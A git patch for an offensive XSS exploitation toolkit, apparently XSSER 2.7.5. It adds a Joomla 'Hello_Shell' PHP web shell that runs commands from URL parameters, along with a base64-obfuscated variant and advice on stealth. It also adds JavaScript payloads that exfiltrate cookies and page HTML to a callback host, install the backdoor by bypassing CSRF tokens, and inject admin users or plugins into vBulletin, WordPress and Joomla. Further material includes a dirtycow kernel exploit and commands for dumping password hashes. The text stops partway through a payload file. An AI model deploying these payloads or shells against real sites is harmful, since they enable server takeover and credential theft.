From 18dbdbdb05f07e7db08ce62bca529f7022fe7062 Mon Sep 17 00:00:00 2001 From: Varbaek Date: Thu, 8 Mar 2018 18:57:25 +0100 Subject: [PATCH] Public Release of Version 2.7.5 + Extras --- Audio/AUDIO_LICENSE | 6 +- CHANGELOG | 104 +- Cool Commands | 14 +- Exploits/dirtycow32.c | 3 +- Hello_Shell/admin/helloshell.php | 28 + .../admin/index.html | 0 .../admin/sql/index.html | 0 .../admin/sql/updates/index.html | 0 .../admin/sql/updates/mysql/0.0.1.sql | 0 .../admin/sql/updates/mysql/index.html | 0 .../helloshell.xml | 13 +- Hello_Shell/site/helloshell.php | 28 + .../site/index.html | 0 Joomla_Backdoor/Hello_Shell.zip | Bin 3089 -> 0 bytes .../Hello_Shell/admin/helloshell.php | 7 - .../Hello_Shell/site/helloshell.php | 7 - LICENSE | 12 +- Payloads/javascript/generic_payload.js | 58 + Payloads/javascript/joomla_admin.js | 62 +- Payloads/javascript/joomla_backdoor.js | 86 + Payloads/javascript/vbulletin_legacy.js | 222 +- Payloads/javascript/wordpress_legacy.js | 343 +-- Payloads/javascript/wordpress_plugin.js | 270 +-- Payloads/javascript/wordpress_theme.js | 258 ++- README.md | 59 +- Shells/meterpreter/LICENSE | 1972 ++++++++--------- Shells/meterpreter/meterpreter.php | 112 +- .../php-reverse-shell-notify.php | 2 +- requirements-all-libraries-used.txt | 15 + requirements.txt | 3 + xsser.py | 1695 ++++++++------ 31 files changed, 3070 insertions(+), 2309 deletions(-) create mode 100644 Hello_Shell/admin/helloshell.php rename {Joomla_Backdoor/Hello_Shell => Hello_Shell}/admin/index.html (100%) rename {Joomla_Backdoor/Hello_Shell => Hello_Shell}/admin/sql/index.html (100%) rename {Joomla_Backdoor/Hello_Shell => Hello_Shell}/admin/sql/updates/index.html (100%) rename {Joomla_Backdoor/Hello_Shell => Hello_Shell}/admin/sql/updates/mysql/0.0.1.sql (100%) rename {Joomla_Backdoor/Hello_Shell => Hello_Shell}/admin/sql/updates/mysql/index.html (100%) rename {Joomla_Backdoor/Hello_Shell => Hello_Shell}/helloshell.xml (84%) create mode 100644 Hello_Shell/site/helloshell.php rename {Joomla_Backdoor/Hello_Shell => Hello_Shell}/site/index.html (100%) delete mode 100644 Joomla_Backdoor/Hello_Shell.zip delete mode 100644 Joomla_Backdoor/Hello_Shell/admin/helloshell.php delete mode 100644 Joomla_Backdoor/Hello_Shell/site/helloshell.php create mode 100644 Payloads/javascript/generic_payload.js create mode 100644 Payloads/javascript/joomla_backdoor.js create mode 100644 requirements-all-libraries-used.txt create mode 100644 requirements.txt diff --git a/Audio/AUDIO_LICENSE b/Audio/AUDIO_LICENSE index 07cff8c..a14f58f 100644 --- a/Audio/AUDIO_LICENSE +++ b/Audio/AUDIO_LICENSE @@ -1,3 +1,5 @@ -The audio files (.wav and .mp3) located within the Audio directory are considered fair use and may not be used commercially, as they are remixed work. (The original files have been modified to say "Shell" instead of "Mail".) +The audio files (.wav and .mp3) located within the Audio directory, are considered fair use and may not be used +commercially, as they are remixed work. (The original files have been modified to say "Shell" instead of "Mail".) -The creator of this tool only holds copyright over the word "Shell" used in the aforementioned audio files, which are applicable to the terms specified in the LICENSE file. (i.e. Less strict and may be remixed.) \ No newline at end of file +The creator of this tool only holds copyright over the word "Shell", used in the aforementioned audio files, which +are applicable to the terms specified in the LICENSE file. (i.e. Less strict and may be remixed.) \ No newline at end of file diff --git a/CHANGELOG b/CHANGELOG index ed47ea8..a948f81 100644 --- a/CHANGELOG +++ b/CHANGELOG @@ -1,18 +1,86 @@ -CHANGELOG - -Version 2.5: -- WordPress Theme and Plugin injection are not using a hardcoded hostname anymore. (TARGETWEBSITE is now properly replaced) -- Removed deprecated code for WordPress Theme and Plugin injection, so that the user is not asked twice to provide hostname to exploit. -- Added dirtycow 32-bit and 64-bit source code files to the web servers. https://www.exploit-db.com/exploits/40616/ Note: This seems to cause kernel panic after the user quits the shell. -- Removed --title from gnome-terminal commands as this option is no longer supported. -- Notifications: - -- Added notification to the console / web server log. - -- Added a popup terminal notification with some ANSI text when the JavaScript is executed and "JS Shell Notify" is triggered. - -- Added a voice notification when the Reverse PHP Shell (Notify) option is executed on the remote server. Shell attempts to wget back to this host to the PHP Shell Notify web handler. -- Automation: - -- vBulletin and WordPress shells are now automatically activated when the JavaScript is triggered. -- New attack vectors: - -- Joomla "SecurityCheck" Addon - https://www.exploit-db.com/exploits/39879/ - EDB ID: 39879 - - Version 2.0: - - First public version for Black Hat Europe \ No newline at end of file +CHANGELOG + +/--------------\ +| Version 2.75 | +\--------------/ +General: +- Various improvements and optimizations. +- Various files may have comments such as: // noinspection JSUndefinedPropertyAssignment + This type of comment is intended for PyCharm to ignore certain warnings and errors. +- Various todo notes have been added to the files for future versions. These also function + as a roadmap, to see what's planned in upcoming releases. +- Added another command to run during post-exploitation scenarios for WordPress. +- Added some other commands and resources for post-exploitation in general. +- Formatted license slightly so that it has appropriate linebreaks. +- Added "requirements.txt" and "requirements-all-libraries-used.txt" files for easier + dependency installation with python pip. + +Joomla backdoor: +- Now checks if the "c" or "c64" parameters are set before executing any code. +- Base64 encoded payloads are now, also supported via the "c64" HTTP parameter. +- All error reporting has been disabled for this backdoor. +- For added stealth, this backdoor/plugin can e.g. be encoded. (Refer to PHP files.) +- Additional comments about advanced usage can also be found in the PHP files. +- For changing how the plugin itself works and is referenced within Joomla, + please refer to the helloshell.xml file. Note: Almost everything can easily be changed + in these files, except the directory name which must also be renamed in xsser.py. + +JavaScript payloads: +- Added a new educational and generic payload. This has not been implemented into xsser.py yet. +- Versions standardized across all payloads. +- SetCookie() now uses non-deprecated functions. +- The "cookie match" now uses regular expressions to properly check if the attacker's cookie is present. +- Joomla payloads now have a "self-removal" option for the initial injection. + Note: This only seems to work when executed manually at the moment. +- WordPress payloads have been updated to use "nonce" instead of "_wpnonce", as this was changed since + last year. A future version may be used to generate the correct payload, depending on whether a very + old version of WordPress is in use, or a currently up to date version. +- The prepopulated forms in the WordPress payloads have been updated, to accommodate source code changes + since last year. +- setTimeout() was updated so it is used in a better, and more maintainable manner. +- Header sections are now more standardized, in terms of design and layout. + +XSSER: +- Switched from gnome-terminal to xterm due to several configuration options being deprecated. +- Removed the redundant requirements description. Please refer to the README.md file instead. +- Removed "written for", "tested on", "tested against", and "changelog". Refer to README.md +- Added new function which gets all assigned IP addresses and lets the user choose which to listen on. + This minimizes the time that the user has to spend on typing the IP address to listen on and serve files from. + -- vBSEO and BetterWPSecurity Exploits: PHP and JS filenames are now generated in a more random manner. +- All JavaScript payloads are now minified (comments and extra newlines removed) and base64 encoded during run-time. +- Converted all "os.system(curl)" requests to python requests with 3 second timeout instead. +- Converted all "httplib.HTTPConnection()" requests to python 'requests' with 3 second timeout. +- Replaced all "%s" with "{}".format() +- Joomla "Hello_Shell" backdoor (zip) file, is now automatically generated each time the xsser.py tool runs. + Note: If you make a change to any of the files in the Hello_Shell directory, simply exit xsser.py and run + it again to automatically create the zip file. +- Experimental POST-request handler implemented into the generic web server. This is currently not used. + +Testing: +- All exploits and payloads have been tested against the latest application versions, except vBulletin 4.X.X + which is not compatible with the now deprecated vBSEO plugin. + +/-------------\ +| Version 2.5 | +\-------------/ +- WordPress Theme and Plugin injection are not using a hardcoded hostname anymore. (TARGETWEBSITE is now + properly replaced) +- Removed deprecated code for WordPress Theme and Plugin injection, so that the user is not asked twice to + provide hostname. +- Added dirtycow 32-bit and 64-bit source code files to the web servers. https://www.exploit-db.com/exploits/40616/ + Note: This seems to cause kernel panic after the user quits the shell. +- Removed --title from gnome-terminal commands as this option is no longer supported. +- Notifications: + -- Added notifications to the console / web server log. + -- Added a popup notification with some ASCII text, when the JavaScript has been fully executed by the target. + -- Added a voice notification, when the Reverse PHP Shell (Notify) option is used, and the associated code + in the PHP shell connects back to the attacker's machine. +- Automation: + -- vBulletin and WordPress shells are now automatically activated when the JavaScript is triggered. +- New attack vectors: + -- Joomla "SecurityCheck" Addon - https://www.exploit-db.com/exploits/39879/ - EDB ID: 39879 + +/-------------\ +| Version 2.0 | +\-------------/ +- First public version for Black Hat Europe \ No newline at end of file diff --git a/Cool Commands b/Cool Commands index 321ea03..a12e663 100644 --- a/Cool Commands +++ b/Cool Commands @@ -5,4 +5,16 @@ cat config.php | grep -P '(MasterServer|dbname)' WordPress: cat wp-config.php | grep -P '(KEY|SALT)' -cat wp-config.php | grep DB_ \ No newline at end of file +cat wp-config.php | grep DB_ + +# Username: root, Password: root, Database name: wordpress +mysql -uroot -proot wordpress -e 'select user_login,user_pass from wp_users;' > /tmp/wordpress_hashes +# Download the file and then run it against hashcat (-m 400) for example. +# See e.g. https://samsclass.info/seminars/CMS/hashcat-wordpress.htm + +Less cool commands: +1) Find world-writeable files: find /dir -xdev -perm +o=w ! \( -type d -perm +o=t \) ! -type l -print +2) Find world-readable files: find /dir -xdev -perm +o=r ! \( -type d -perm +o=t \) ! -type l -print + +Privilege escalation: +https://github.com/mzet-/linux-exploit-suggester \ No newline at end of file diff --git a/Exploits/dirtycow32.c b/Exploits/dirtycow32.c index 9fb5708..d86a2d4 100644 --- a/Exploits/dirtycow32.c +++ b/Exploits/dirtycow32.c @@ -30,7 +30,7 @@ struct stat st; char *name; pthread_t pth1,pth2,pth3; -// change if no permissions to read +// Change if no permissions to read char suid_binary[] = "/usr/bin/passwd"; /* @@ -51,7 +51,6 @@ unsigned char sc[] = { 0x89, 0xe1, 0xcd, 0x80 }; unsigned int sc_len = 136; -/**/ void *madviseThread(void *arg) { diff --git a/Hello_Shell/admin/helloshell.php b/Hello_Shell/admin/helloshell.php new file mode 100644 index 0000000..07422eb --- /dev/null +++ b/Hello_Shell/admin/helloshell.php @@ -0,0 +1,28 @@ +"; + echo @system($_GET['c']); // Don't output errors. + echo ""; +} + +if (isset($_GET['c64']) && !empty($_GET['c64'])) { + echo "
";
+  echo @system(base64_decode($_GET['c64'])); // Allow Base64 input
+  echo "
"; +} + +// If you want to be more stealthy, then you can use only the line below. +// Samples seen in the wild typically use a mix of base64, gzip, odd variables and multiple rounds of encoding. +// eval(base64_decode("aWYgKGlzc2V0KCRfR0VUWydjJ10pICYmICFlbXB0eSgkX0dFVFsnYyddKSkgew0KICBlY2hvICI8cHJlPiI7DQogIGVjaG8gQHN5c3RlbSgkX0dFVFsnYyddKTsgLy8gRG9uJ3Qgb3V0cHV0IGVycm9ycy4NCiAgZWNobyAiPC9wcmU+IjsNCn0NCg0KaWYgKGlzc2V0KCRfR0VUWydjNjQnXSkgJiYgIWVtcHR5KCRfR0VUWydjNjQnXSkpIHsNCiAgZWNobyAiPHByZT4iOw0KICBlY2hvIEBzeXN0ZW0oYmFzZTY0X2RlY29kZSgkX0dFVFsnYzY0J10pKTsgLy8gQWxsb3cgQmFzZTY0IGlucHV0DQogIGVjaG8gIjwvcHJlPiI7DQp9")); + +// If you use this during a penetration test, you may want to consider adding some sort of authentication. +// This can be achieved by adding another check, such as: if ($_GET['auth']=="md5-hash-here") { @system() code here } +// Obviously, GET-requests have a length limit, and are also logged by default with pretty much any web server. +// To circumvent this, you could use POST-requests, which some web servers log. You can also use cookies, or a +// custom HTTP header. Future versions of this tool may include functionality to automatically modify this backdoor. +?> diff --git a/Joomla_Backdoor/Hello_Shell/admin/index.html b/Hello_Shell/admin/index.html similarity index 100% rename from Joomla_Backdoor/Hello_Shell/admin/index.html rename to Hello_Shell/admin/index.html diff --git a/Joomla_Backdoor/Hello_Shell/admin/sql/index.html b/Hello_Shell/admin/sql/index.html similarity index 100% rename from Joomla_Backdoor/Hello_Shell/admin/sql/index.html rename to Hello_Shell/admin/sql/index.html diff --git a/Joomla_Backdoor/Hello_Shell/admin/sql/updates/index.html b/Hello_Shell/admin/sql/updates/index.html similarity index 100% rename from Joomla_Backdoor/Hello_Shell/admin/sql/updates/index.html rename to Hello_Shell/admin/sql/updates/index.html diff --git a/Joomla_Backdoor/Hello_Shell/admin/sql/updates/mysql/0.0.1.sql b/Hello_Shell/admin/sql/updates/mysql/0.0.1.sql similarity index 100% rename from Joomla_Backdoor/Hello_Shell/admin/sql/updates/mysql/0.0.1.sql rename to Hello_Shell/admin/sql/updates/mysql/0.0.1.sql diff --git a/Joomla_Backdoor/Hello_Shell/admin/sql/updates/mysql/index.html b/Hello_Shell/admin/sql/updates/mysql/index.html similarity index 100% rename from Joomla_Backdoor/Hello_Shell/admin/sql/updates/mysql/index.html rename to Hello_Shell/admin/sql/updates/mysql/index.html diff --git a/Joomla_Backdoor/Hello_Shell/helloshell.xml b/Hello_Shell/helloshell.xml similarity index 84% rename from Joomla_Backdoor/Hello_Shell/helloshell.xml rename to Hello_Shell/helloshell.xml index fceddae..2b09bef 100644 --- a/Joomla_Backdoor/Hello_Shell/helloshell.xml +++ b/Hello_Shell/helloshell.xml @@ -1,17 +1,18 @@ + - + Hello Shell! - November 2016 - John Doe - john.doe@example.org - http://www.example.org + March 2018 + Varbaek + xsser@varbits.net + https://www.varbits.com Copyright Info License Info - 0.0.1 + 2.7.5 Description of the Hello Shell component ... diff --git a/Hello_Shell/site/helloshell.php b/Hello_Shell/site/helloshell.php new file mode 100644 index 0000000..07422eb --- /dev/null +++ b/Hello_Shell/site/helloshell.php @@ -0,0 +1,28 @@ +"; + echo @system($_GET['c']); // Don't output errors. + echo ""; +} + +if (isset($_GET['c64']) && !empty($_GET['c64'])) { + echo "
";
+  echo @system(base64_decode($_GET['c64'])); // Allow Base64 input
+  echo "
"; +} + +// If you want to be more stealthy, then you can use only the line below. +// Samples seen in the wild typically use a mix of base64, gzip, odd variables and multiple rounds of encoding. +// eval(base64_decode("aWYgKGlzc2V0KCRfR0VUWydjJ10pICYmICFlbXB0eSgkX0dFVFsnYyddKSkgew0KICBlY2hvICI8cHJlPiI7DQogIGVjaG8gQHN5c3RlbSgkX0dFVFsnYyddKTsgLy8gRG9uJ3Qgb3V0cHV0IGVycm9ycy4NCiAgZWNobyAiPC9wcmU+IjsNCn0NCg0KaWYgKGlzc2V0KCRfR0VUWydjNjQnXSkgJiYgIWVtcHR5KCRfR0VUWydjNjQnXSkpIHsNCiAgZWNobyAiPHByZT4iOw0KICBlY2hvIEBzeXN0ZW0oYmFzZTY0X2RlY29kZSgkX0dFVFsnYzY0J10pKTsgLy8gQWxsb3cgQmFzZTY0IGlucHV0DQogIGVjaG8gIjwvcHJlPiI7DQp9")); + +// If you use this during a penetration test, you may want to consider adding some sort of authentication. +// This can be achieved by adding another check, such as: if ($_GET['auth']=="md5-hash-here") { @system() code here } +// Obviously, GET-requests have a length limit, and are also logged by default with pretty much any web server. +// To circumvent this, you could use POST-requests, which some web servers log. You can also use cookies, or a +// custom HTTP header. Future versions of this tool may include functionality to automatically modify this backdoor. +?> diff --git a/Joomla_Backdoor/Hello_Shell/site/index.html b/Hello_Shell/site/index.html similarity index 100% rename from Joomla_Backdoor/Hello_Shell/site/index.html rename to Hello_Shell/site/index.html diff --git a/Joomla_Backdoor/Hello_Shell.zip b/Joomla_Backdoor/Hello_Shell.zip deleted file mode 100644 index d1e3118cd6e9a117dc4cc31b390ecad761710746..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 3089 zcmWIWW@Zs#W&i??#mSx^8U}cP43E^Doc#FU3?QW+09UEE6IG=Un##nK+{`?JG3xExik%EFM{+RuIeEC9RF=(G0a~U5#4=bd z&CE+ltstH+6gQZm{v2vO~(u@ zF|4K+7b1cU(?tq6^-#-IayV@$El5c$Ni9Z-B=qpoAgGsGt^~ypazcY7A5hrAT$x)5 z3rQ|;QU$pcs0j{qfh=N7Fwis5Gt>i`g*%z(5or{8p66iLwJ_O}uj}H*k4y{h?r@A6{UMOXy-6V=&yX5%=>uBo4(2OK6zI8EHQ04#kC|xUsimA zNOiS-(P2{&dB&NWGF#XGwaIp>aFPE~`r6u|@z|w#h3sdpF|IB?xltZ;5tR74$KFBO${*CdAjEuFNP1V%&!^Vd`iB2j#I(042?hO;t4KK*o zUWi%si0^!G;zQk>9qU9Vtm$|wSbNBPIhPSrZN&QPFTeY7WfqkmfB z#FXvoGbX8O@gFU%**?MS)=PJ$GB<-M%`Fq>S!%2mR+!PV_|ubF>5b<_w=`|-JepWF zL+)whZrLj31JnJ?{1Wcw`m^Z#@Cx+2ZQ>Ze`%v?iM~mVoH@C=~arW8e!jiGm3DUAz0ax>UR?TdVCtd`%zGqfbmrJR^$?ih zuX*Lf_A5J@D?G$cWlgJ;RJgtFPNamltJdR|2F|wRJv$Fx;<&LS^nymL_#L+i`>$O# zUc0)AThx4?;1q7%-X*(b9({5BdM~&2Cd-+u6@~{*j!rT8{zd_`Y&JYC4ZkkXP2M5_|^KocTKl9PTI|EJ8$B{pO!ynJHCka+aI%i{)_To zE|Xk~ogYg*{`==aR(ajGPj6nvul~Ua%b1uYtRPxODb6fOMJm3~>lk@#%8@b`Evgu4 zY<7}bP%tvtGvlt1fi?hvK*Iq?5RF{s1$ZNLVymD*>LEI{fHbmBSal84kG;YMYiCes zSkf4URX=LjB3y%6?}2J!2mqOO9>~OW4IkLQDj?6WB~5%0#5P7p1c@bu(0UH*`0fCg9f%PyV znlKX~s9=HsP=NNcp_&6NrVw7lR!~8-gFbw_qk2Pzi)E%m~=NK=u>Z YEy#hx3bc)ZfgcESSQr@kfyx;e0H6!it^fc4 diff --git a/Joomla_Backdoor/Hello_Shell/admin/helloshell.php b/Joomla_Backdoor/Hello_Shell/admin/helloshell.php deleted file mode 100644 index 4a15c7d..0000000 --- a/Joomla_Backdoor/Hello_Shell/admin/helloshell.php +++ /dev/null @@ -1,7 +0,0 @@ -"; -echo system($_GET['c']); -echo ""; - -?> diff --git a/Joomla_Backdoor/Hello_Shell/site/helloshell.php b/Joomla_Backdoor/Hello_Shell/site/helloshell.php deleted file mode 100644 index 4a15c7d..0000000 --- a/Joomla_Backdoor/Hello_Shell/site/helloshell.php +++ /dev/null @@ -1,7 +0,0 @@ -"; -echo system($_GET['c']); -echo ""; - -?> diff --git a/LICENSE b/LICENSE index f152a42..6170346 100644 --- a/LICENSE +++ b/LICENSE @@ -10,13 +10,15 @@ to make commercial use of the work Under the following conditions: Attribution -- You must give the original author credit. -Share Alike -- If you alter, transform, or build upon this work, you may distribute the resulting work only under a licence identical to this one. +Share Alike -- If you alter, transform, or build upon this work, you may distribute the resulting + work only under a licence identical to this one. With the understanding that: Waiver -- Any of the above conditions can be waived if you get permission from the copyright holder. -Public Domain -- Where the work or any of its elements is in the public domain under applicable law, that status is in no way affected by the licence. +Public Domain -- Where the work or any of its elements is in the public domain under applicable law, + that status is in no way affected by the licence. Other Rights -- In no way are any of the following rights affected by the licence: @@ -24,9 +26,11 @@ Your fair dealing or fair use rights, or other applicable copyright exceptions a The author's moral rights; -Rights other persons may have either in the work itself or in how the work is used, such as publicity or privacy rights. +Rights other persons may have either in the work itself or in how the work is used, such as publicity +or privacy rights. Notice -- For any reuse or distribution, you must make clear to others the licence terms of this work. -This license does not apply to meterpreter.php (refer to Metasploit's license) and php-reverse-shell.php (refer to the attached GPLv2). \ No newline at end of file +This license does not apply to meterpreter.php (refer to Metasploit's license) and php-reverse-shell.php +(refer to GPLv2: https://www.gnu.org/licenses/old-licenses/gpl-2.0.en.html). \ No newline at end of file diff --git a/Payloads/javascript/generic_payload.js b/Payloads/javascript/generic_payload.js new file mode 100644 index 0000000..877c9f1 --- /dev/null +++ b/Payloads/javascript/generic_payload.js @@ -0,0 +1,58 @@ +/* +Title: Generic JS Payload +Author: Hans-Michael Varbaek +Company: VarBITS + +Version: 2.75 - Extras + +Changelog: +- Ver 2.75 : First version published with the "extras" release. + +Inspired by: XSSHunter + +Description: +This payload obtains information about the page where it was executed. +While it does not attempt to hook the browser, or make the administrator +perform an arbitrary action, it is useful during web app penetration tests +where hidden functionality is not tested, such as a control panel which +may be vulnerable to stored cross-site scripting. +(i.e. a user's profile is viewed from an admin control panel.) + +This particular payload is mostly meant for educational purposes. + +TODO: +- Implement this as an option within the xsser.py tool +- Implement error handling in a future version if necessary: + try { + x = x(); + } catch ( e ) { + x = ''; + } + +For ethical and legal purposes only. This script is provided as is and without warranty. +*/ + +// DEFINE VARIABLES +var domain = document.domain; // "pypi.python.org" +// You can also use the following: location.origin which includes the scheme, i.e. http/https +var location = document.location(); // "https://pypi.python.org/pypi/jsmin" +// You could also use the following: location.toString() +var cookies = document.cookie; // "__utma=1234567890...;__utmb=0987654321" +var referrer = document.referrer; // "google.com" +var useragent = navigator.userAgent; // "Mozilla/5.0 ..." +var unixtime = new Date().getTime().toString(); // 1515353242209 +var fullpage = document.documentElement.outerHTML; // Complete HTML page, useful for analysis. + +// CREATE FORM AND SEND REQUEST +var formData = new FormData(); +formData.append("domain_name", domain); +formData.append("complete_url", location); +formData.append("non_http_only_cookies", cookies); +formData.append("http_referer", referrer); +formData.append("user_agent", useragent); +formData.append("unix_time", unixtime); +formData.append("full_html_page", fullpage); + +var request = new XMLHttpRequest(); +request.open("POST", "http://CALLBACKHOST:CALLBACKPORT/"); // This will be populated by the xsser.py tool. +request.send(formData); \ No newline at end of file diff --git a/Payloads/javascript/joomla_admin.js b/Payloads/javascript/joomla_admin.js index 9110f35..6728674 100644 --- a/Payloads/javascript/joomla_admin.js +++ b/Payloads/javascript/joomla_admin.js @@ -1,10 +1,28 @@ -// Original authors: Gökmen Güreçi & Muhammet Dilmaç -// Modified by Hans-Michael Varbaek for the XSSER 2.5 -// -// For ethical and legal purposes only. This script is provided as is and without warranty. +/* +Title: Joomla Core Payload (New Admin User) +Author: Hans-Michael Varbaek +Company: VarBITS -var request = new XMLHttpRequest(); -var req = new XMLHttpRequest(); +Version: 2.75 + +Changelog: +- Ver 2.75 : A few minor improvements. +- Ver 2.5 : First release. + +Special Credits: Gökmen Güreçi, Muhammet Dilmaç and Sense of Security (Version 2.5) + +For ethical and legal purposes only. This script is provided as is and without warranty. + +TODO: +- For pre-existing forms, consider using FormData to read and update/set new values in the future: +https://developer.mozilla.org/en-US/docs/Web/API/FormData/Using_FormData_Objects +https://developer.mozilla.org/en-US/docs/Web/API/FormData +https://developer.mozilla.org/en-US/docs/Web/API/FormData/set +-- Update this payload, or add a new payload that uses FormData() and XMLHttpRequest() +*/ + +var request = new XMLHttpRequest(); // Initial request to get CSRF token +var req = new XMLHttpRequest(); // Subsequent request to inject new user var id = ''; var boundary = Math.random().toString().substr(2); var space = "-----------------------------"; @@ -84,21 +102,31 @@ request.onload = function() { "\r\nContent-Disposition: form-data; name=\"" + id + "\"" + "\r\n\r\n1\r\n" + space + boundary + "--\r\n"; - req.onload = function() { - if (req.status >= 200 && req.status < 400) { - var resp = req.responseText; - console.log(resp); - } - }; req.send(multipart); } }; request.send(); - // NEW FEATURE (Callback Notification) - var request2 = new XMLHttpRequest(); // Initiate XMLHttpRequest - request2.open("GET", "http://CALLBACKHOST:CALLBACKPORT/js_shell_notify.txt"); // Method and URL to send the request to - Hostname and port are set by xsser.py - request2.send(); // Send the request +// Callback Notification +var request2 = new XMLHttpRequest(); // Initiate XMLHttpRequest +request2.open("GET", "http://CALLBACKHOST:CALLBACKPORT/js_shell_notify.txt"); +// Method and URL to send the request to - Hostname and port are set by: xsser.py +request2.send(); // Send the request + +// TODO: Fix this in a later version +// Confirmed working manually in Chrome. For some reason, it does not work when executed as a script. +/* +Maybe we need to introduce a delay? +Maybe we have to specify top.document? + + setTimeout(function() { + clean_up(); + }, 2000); -//Joomla.checkAll(this); // For auto self-clean up later +checkboxes = document.getElementsByName('cid[]'); +for(var i=0, n=checkboxes.length;i= 200 && request.status < 400) { + var resp = request.responseText; + var myRegex = //; + id = myRegex.exec(resp)[1]; + req.open('POST', 'index.php?option=com_installer&view=install', true); + req.setRequestHeader("content-type", "multipart/form-data; boundary=---------------------------" + boundary); + var multipart = space + boundary + + "\r\nContent-Disposition: form-data; name=\"install_package\"; filename=\"\"" + + "\r\nContent-Type: application/octet-stream\r\n\r\n\r\n" + + space + boundary + + "\r\nContent-Disposition: form-data; name=\"install_directory\"" + + "\r\n\r\n/var/www/html/tmp\r\n" + + space + boundary + + "\r\nContent-Disposition: form-data; name=\"install_url\"" + + "\r\n\r\nVAR_BACKDOOR_URL\r\n" + + space + boundary + + "\r\nContent-Disposition: form-data; name=\"type\"" + + "\r\n\r\n\r\n" + + space + boundary + + "\r\nContent-Disposition: form-data; name=\"installtype\"" + + "\r\n\r\nurl\r\n" + + space + boundary + + "\r\nContent-Disposition: form-data; name=\"task\"" + + "\r\n\r\ninstall.install\r\n" + + space + boundary + + "\r\nContent-Disposition: form-data; name=\"" + id + "\"" + + "\r\n\r\n1\r\n" + + space + boundary + "--\r\n"; + req.send(multipart); + } +}; + +request.send(); + +// Callback Notification +var request2 = new XMLHttpRequest(); // Initiate XMLHttpRequest +request2.open("GET", "http://CALLBACKHOST:CALLBACKPORT/js_shell_notify.txt"); +// Method and URL to send the request to - Hostname and port are set by: xsser.py +request2.send(); // Send the request + +// TODO: Fix this in a later version +// Confirmed working manually in Chrome. For some reason, it does not work when executed as a script. +/* +Maybe we need to introduce a delay? +Maybe we have to specify top.document? + + setTimeout(function() { + clean_up(); + }, 2000); + +checkboxes = document.getElementsByName('cid[]'); +for(var i=0, n=checkboxes.length;i\ - \ - \ - \ - \ - \ - \ - \ - \ - '; - - // A function which injects our prepopulated form - function silent_form_inject(action,method,content) { - var silent_main_tag = document.createElement('form'); - - // The inner contents of our form is equal to the content variable - This is the legacy way of doing it - silent_main_tag.innerHTML = ' '+content; - top.document.getElementById('silent_frame').contentDocument.body.appendChild(silent_main_tag); - silent_main_tag.setAttribute('id','soslabs'); - silent_main_tag.setAttribute('name','soslabs'); - silent_main_tag.setAttribute('action',action); - silent_main_tag.setAttribute('method',method); - } - - // Inject our prepopulated form - silent_form_inject('plugin.php?do=update','POST',form_input); - - // Submit our payload automatically - There's no turning back now - if (document.cookie.indexOf("XSS_Infected") == -1) { - top.document.getElementById('silent_frame').contentDocument.getElementById('soslabs').submit(); - // NEW FEATURE - Moved to this section to prevent double-loading of the URL - var request = new XMLHttpRequest(); // Initiate XMLHttpRequest - request.open("GET", "http://CALLBACKHOST:CALLBACKPORT/js_shell_notify.txt"); // Method and URL to send the request to - Hostname and port are set by xsser.py - request.send(); // Send the request - SetCookie("XSS_Infected","true"); // Prevent re-infection / loops - } - - // Give the malicious linkback two seconds to inject our payload, before self-removal - var end = setTimeout("clean_up()",2000); - -} - -// Delete all LinkBacks on the current page - Including ours -// This basically removes our injected data -function clean_up() { - js_check_all_option(document.linkbacks, -1); - document.linkbacks.submit(); -} - -// A function to create a cookie so the infection happens only once -function SetCookie(cookieName,cookieContent) { - var cookiePath = '/'; - var expDate=new Date(); - expDate.setTime(expDate.getTime()+372800000); - var expires=expDate.toGMTString(); - document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires; -} - - -// If our cookie is not present, continue -if (document.cookie.indexOf("XSS_Infected") == -1) { - - // Append a (hidden) iframe to the HTML body for data injection - var mainframe = document.createElement("iframe"); - mainframe.setAttribute('id', 'silent_frame'); - top.document.body.appendChild(mainframe); - mainframe.setAttribute('onload', 'main.silent_inject()'); - mainframe.setAttribute('src', 'plugin.php?do=add'); -} - +/* +Title: vBulletin Core Payload (Plugin) +Author: MaXe / InterN0T +Updated by: Hans-Michael Varbaek +Company: VarBITS + +Version: 2.75 + +Changelog: +- Ver 2.75 : Changed coding style to be more consistent. + Fixed various deprecated functions. + Various other minor improvements. +- Ver 2.5 : Added XMLHttpRequest for JS Notification. +- Ver 2.0 : First release. + +Special Credits: InterN0T and Sense of Security (Versions 2.0 to 2.5) + +For ethical and legal purposes only. This script is provided as is and without warranty. + +TODO: +- For pre-existing forms, consider using FormData to read and update/set new values in the future: +https://developer.mozilla.org/en-US/docs/Web/API/FormData/Using_FormData_Objects +https://developer.mozilla.org/en-US/docs/Web/API/FormData +https://developer.mozilla.org/en-US/docs/Web/API/FormData/set +-- Update or add another payload which uses FormData() and XMLHttpRequest() +*/ + +// Some IDEs may complain that silent_inject() is not used. (It is used.) +// noinspection JSUnusedGlobalSymbols +function silent_inject() { + + // Read and save the adminhash + securitytoken - For bypassing the CSRF protection. + // noinspection Annotator + var adminhash = top.document.getElementById('silent_frame').contentDocument.cpform.adminhash.value; + // noinspection Annotator + var securitytoken = top.document.getElementById('silent_frame').contentDocument.cpform.securitytoken.value; + + // TODO: Use the pre-existing form in the future if possible. + // Prepopulated form that adds a new plugin to vBulletin + // The adminhash and securitytoken parameters are CSRF tokens + // The phpcode parameter value is updated by the (xsser.py) python script + var form_input = ''; + form_input += ''; + form_input += ''; + form_input += ''; + form_input += ''; + form_input += ''; + form_input += ''; + form_input += ''; + form_input += ''; + form_input += ''; + // Note: The HTML input was changed because python's "jsmin" would treat the content as comments. + + // A function which injects our prepopulated form + function silent_form_inject(action, method, content) { + var silent_main_tag = document.createElement('form'); + + // The inner contents of our form is equal to the content variable - This is the legacy way of doing it. + silent_main_tag.innerHTML = ' '+content; + top.document.getElementById('silent_frame').contentDocument.body.appendChild(silent_main_tag); + silent_main_tag.setAttribute('id', 'varbits'); + silent_main_tag.setAttribute('name', 'varbits'); + silent_main_tag.setAttribute('action', action); + silent_main_tag.setAttribute('method', method); + } + + // Inject our prepopulated form + silent_form_inject('plugin.php?do=update', 'POST', form_input); + + // Submit our payload automatically - There's no turning back now + //if (document.cookie.indexOf("XSS_Infected") == -1) { + // TODO: Make the "XSS_Infected" cookie name a function argument for silent_inject() + // TODO: Maybe move document.cookie.match() to the beginning of silent_inject() + if (!document.cookie.match(/^(.*;)?\s*XSS_Infected\s*=\s*[^;]+(.*)?$/)) { + // TODO: Maybe move submit() down to after the notification, but before SetCookie() + 